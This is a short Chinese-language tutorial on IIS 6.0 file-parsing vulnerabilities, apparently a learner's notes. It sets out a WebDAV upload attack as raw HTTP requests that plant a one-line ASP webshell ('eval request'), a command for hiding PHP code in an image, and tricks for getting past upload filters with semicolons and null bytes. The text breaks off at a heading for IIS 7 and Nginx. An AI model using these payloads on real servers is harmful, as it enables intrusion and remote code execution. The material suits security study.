關於解析漏洞
IIS6.0 解析漏洞
1.在網站目錄中如果存在名為*.asp、*asa的目錄,那麽該目錄下內的任何文件都會被解析成asp文件被執行。
2.再上傳圖片木馬的時候,將文件名改為*.asp;,jpg,該文件文件都會被IIS解析為asp文件執行。
3.還有IIS6.0 默認的可執行文件除了asp還包含這三種/wooyun.cer、/wooyun.asa、/wooyun.cdx
4.(轉載)WebDav漏洞(對IIS寫權限的利用,這個我們在之前學http請求的時候就說過的請求頭和正文語句,這段好好看)
- 第一步,通過OPTIONS探測服務器所支持的HTTP方法
請求:
OPTIONS / HTTP/1.1
Host:www.example.com
響應:
Public:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,POST,COPY,MOVE,MKCOL,PROPFIND,PROPPATCH,LOCK,UNLOCK,SEARCH
- 第二步,通過PUT方法向服務器上傳腳本文件
請求:
PUT /a.txt HTTP/1.1
Host:www.example.com
Content-Length:30
<%eval request("chopper")%>
第三步,通過Move或Copy方法改名
請求:
COPY /a.txt HTTP/1.1
Host:www.example.com
Destination:http://www.example.com/cmd.asp
第四步,使用DELETE方法,攻擊者還可以刪除服務器上的任意文件
請求:
DELETE /a.txt HTTP/1.1
Host:www.example.com
5.當你上傳的木馬如asp/aspx,必須在IIS6.0環境,且在以x.asp為名稱的文件夾下面,才能執行圖片裏的代碼,也就是說,圖片木馬執行必須滿足2個條件:A:有x.asp文件夾;B:圖片木馬在x.asp文件夾下,那麽怎麽去達到這種目的就需要奇藝技巧了,常見的是通過%00截斷和一些個更改上傳時候的屬性。(下面會講到)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
圖片木馬制作方法
使用CMD制作一句話木馬。
參數/b指定以二進制格式復制、合並文件; 用於圖像類/聲音類文件
參數/a指定以ASCII格式復制、合並文件。用於txt等文檔類文件
copy 1.jpg/b+1.php 2.jpg
//意思是將1.jpg以二進制與1.php合並成2.jpg
那麽2.jpg就是圖片木馬了。
--------------------------------------------------------------------------------------------------
查看數據包,其中Content-Disposition:form-data;name=”path”
下面的一行為服務保存文件的相對路徑,我們把原本的 uploadimg/
改為 uploadimg/1.php;
。
---------------------------------------------------------------------------------------------------
截斷上傳,是借助%00截斷上傳使%00後面的字串被忽略,如:1.asp.jpg=1.asp%00.jpg,從而成功上傳shell。
---------------------------------------------------------------------------------------------------
二、IIS7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞
關於解析漏洞